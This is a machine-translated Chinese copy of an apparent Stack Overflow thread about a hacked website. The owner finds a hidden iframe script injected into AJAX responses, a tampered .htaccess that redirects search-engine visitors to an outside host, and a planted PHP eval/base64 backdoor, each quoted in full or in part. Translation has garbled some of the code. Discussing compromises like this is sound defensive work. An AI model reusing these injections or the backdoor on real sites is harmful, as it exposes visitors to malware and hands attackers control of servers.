Php 使用AJAX调用返回数据非常混乱

Php 使用AJAX调用返回数据非常混乱,php,javascript,html,ajax,.htaccess,Php,Javascript,Html,Ajax,.htaccess,每当在站点上单击链接时,我都会收到一个AJAX请求,要求自动加载内容。然而,最近,我看到返回数据中注入了一些令人困惑的代码: var_q=document.createElement('iframe'), _n='setAttribute'; _q[_n]('src','http://cabaniaseleden.com.ar/stats.php'); _q、 style.position='绝对'; _q、 style.width='12px'; _q[_n]('frameborder',n

每当在站点上单击链接时,我都会收到一个AJAX请求,要求自动加载内容。然而,最近,我看到返回数据中注入了一些令人困惑的代码:


var_q=document.createElement('iframe'),
_n='setAttribute';
_q[_n]('src','http://cabaniaseleden.com.ar/stats.php');
_q、 style.position='绝对';
_q、 style.width='12px';
_q[_n]('frameborder',navigator.userAgent.indexOf('39c33260f6d7671e2dae7f087e22')+1);
_q、 style.left='-4327px';
文件。写(“”);
document.getElementById('pzeadv').appendChild(_q);​
这是我当前单击的代码:

$(“#导航a”)。单击(功能(事件){
var sHREF=$(this.attr(“href”);
var sPage=sHREF.replace(oVars.sPrefix(),“”);
如果(oVars.sCurrent!=sPage){
//只要我们现在不在我们刚才点击的页面上。。。
//卵圆=卵裂;
if(oVars.oArchive.isOpen())oVars.oArchive.toggle();
loadContent(sHREF、true、false);
轨道(sPage);
}
event.preventDefault();
});​
。。。以及
loadContent
功能:

函数加载内容(sURL、bPush、bReplace){
变量$Box=$(“#加载的.Box-1”),
$Content=$Box.find(“.inner”);
$(“#nav a”).removeClass(“活动”);
$(“#nav a[href=”+sURL+“]”)addClass(“活动”);
oVars.SCURENT=表面分割(“&”)[0];
//关闭在Colorbox中打开的任何图片。
if(oVars.sCurrent!=“pictures”&&oVars.bI&&&$(“#colorbox”).css(“display”)!=“none”)
$.colorbox.close();
如果(!oVars.bIE){
if(bPush){
var objState={page:oVars.sCurrent};
如果(布雷莱斯)
replaceState(objState,“,”);
其他的
历史。pushState(对象状态,“,sURL);
}else{}
}
如果(!bReplace){
//加载页面。
$Box.slideUp(oVars.iSpeed/2,“,函数(){
美元(
“index.php”+oVars.sPrefix()+sURL,
oVars.oNHF,
功能(sData){
var$El=$(sData).filter(“:first”),//这是将显示的元素
$Script=$(sData).filter(“:last”),
sPage=extractPage(“结束”).toLowerCase();
控制台调试(sData);
//将documentElement更改为body,并规避iPhone版本引起的问题…yadda yadda。
document.documentElement.className=sPage;
//尝试使用正则表达式替换分隔符后面的单词。
document.title=oPHP.const.NAME+oPHP.const.TEXT_DIVIDER+((sPage==“home”)?“home”:oPHP.vars.titles[sPage]。替换(//\/,“”).trim();//ucwords(sPage);
$Box.html(sData).slideDown(oVars.iSpeed/2);
//重新加载当前页面的Facebook小部件。
重新加载Widgets();
}
);
} );
}
}
loadContent
中的
sData
正在返回开头的神秘的
标记,如下所示:


//这是插入到我的代码中的邪恶片段。
var_q=document.createElement('iframe'),
_n='setAttribute';
_q[_n]('src','http://cabaniaseleden.com.ar/stats.php');
_q、 style.position='绝对';
_q、 style.width='12px';
_q[_n]('frameborder',navigator.userAgent.indexOf('39c33260f6d7671e2dae7f087e22')+1);
_q、 style.left='-4327px';
文件。写(“”);
document.getElementById('pzeadv').appendChild(_q);
图片
相册
(4张专辑,13张图片)

我的数据在脚本标记之后,它不在我的代码中。您可以自己在某种控制台中检查此问题。

这是由于修改了我服务器上的
.htaccess
文件造成的。我有一份本地副本,所以我重写了它。该文件的内容变为:

#c3284d#
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|blog|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*)
RewriteRule ^(.*)$ http://cabaniaseleden.com.ar/stats.php [R=301,L]
</IfModule>
#/c3284d#

RewriteEngine on

RewriteCond %{HTTP_HOST} ^ts\.x10\.mx$ [OR]
RewriteCond %{HTTP_HOST} ^www\.ts\.x10\.mx$
RewriteRule ^/?$ "http\:\/\/75\.66\.61\.141\/" [R=301,L]

我们需要打击像这样的网络入侵,以防止类似的事情发生。它基本上在我访问的每台服务器上。我不知道它是如何到达那里的;我得查一下日志。

是的,我同意。另外…请检查根目录中的额外文件。它可以命名为任何c.php、default.php等。。。它有一个php代码开始:

if($_GET["rnd"]){die($_GET["rnd"]);}elseif($_POST["e"]){eval(base64_decode(str_rot13......
你也可以在网站上搜索is。此文件是在更改上述.htaccess代码的同时添加的


我试图追踪的不是来源,而是上传的方式,看起来是通过FTP完成的。保护您的FTP安全,如果您运行WordPress或Joomla,请保护您的登录页面免受暴力/彩虹攻击,这在用户名已知时非常简单(在帖子下面列出)。有人知道更多详细信息吗?

请您只显示相关代码。人们没有阅读这么长的问题的习惯。我通常没有,但有人说我没有提供足够的信息。除此之外,大部分都是相关的。他的意思是“清理你的代码”。有注释的部分、大量空白、额外的行和一些不好的做法。例如,“document.write”永远不应该这样使用(或者根本不应该这样使用),而且匈牙利符号在javascript代码中是不受欢迎的。@DominicGulet,我认为他不是这个意思。还有,如果有人想